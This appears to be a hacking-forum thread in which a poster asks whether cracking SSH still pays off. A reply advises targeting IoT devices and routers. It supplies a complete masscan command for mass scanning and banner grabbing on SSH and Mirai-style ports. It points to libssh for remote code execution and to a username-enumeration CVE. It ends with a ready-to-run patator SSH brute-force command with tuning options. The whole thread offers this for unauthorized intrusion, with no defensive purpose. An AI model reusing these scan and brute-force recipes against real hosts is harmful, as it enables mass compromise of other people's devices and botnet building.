Cracking SSH
by ksecurity - September 15, 2021 at 03:45 PM
Is Cracking SSH make sense in 2021 ? 

What will community vote for. Which kind of scanning method is recommended these days.

1. Cracking SSH
2. Exploiting RCE bugs
3. Scanning for IOT Devices.
Cracking ssh make sense if you crack ssh of IOT devices, routers. Servers with their admins is a hard target.
If u are on Linux, I think u should use of course masscan/zmap, but masscan is better and i will tell u about masscan. Masscan by default scan ips and ports, check if port open or not, it dont check is on port ssh service. U can add option: --banners, then Masscan will grab banners of services on open ports.
For example:
sudo masscan -iL fileWithIps --open -p 1900-2300,22,2323,3232,1234,12345 --banners --rate=5000 -oL YourOutputFile
-iL - file with ips.
--open - check for only open(not filtered) ports
-p - ports
--rate - qty of kpp
-oL - output file
After masscan have done his work, u will have in output file open ports and banners. If u need to see all ports with ssh:
cat YourOutputFile | grep ssh
What about exploits? Libssh is very nice for rce. However more popular openssh is more protected, then libssh. I usually use CVE 2018-15473 (Username enumeration, not rce).
If u are looking for IOT devices, u need to set scanning ports to 23,2323,32,3232,22 (as bots of botnet mirai) and other ports, that IOT usually use.
Bruteforce. I think the best bruteforcer is patator. For example:
python3 ssh_login host=COMBO00 port=COMBO01 user=FILE1 password=FILE2 0=hosts_ports.txt 1=users.txt 2=pass.txt -l outDir --threads 32 -x skip=0:fgrep='No route to host' -x skip=0:fgrep='Bad authentication type'' -x igore:code=1
(openSSH usually send 'Bad authentication type', if u need a publickey; 'No route to host', if host is down)

 Users browsing this thread: 1 Guest(s)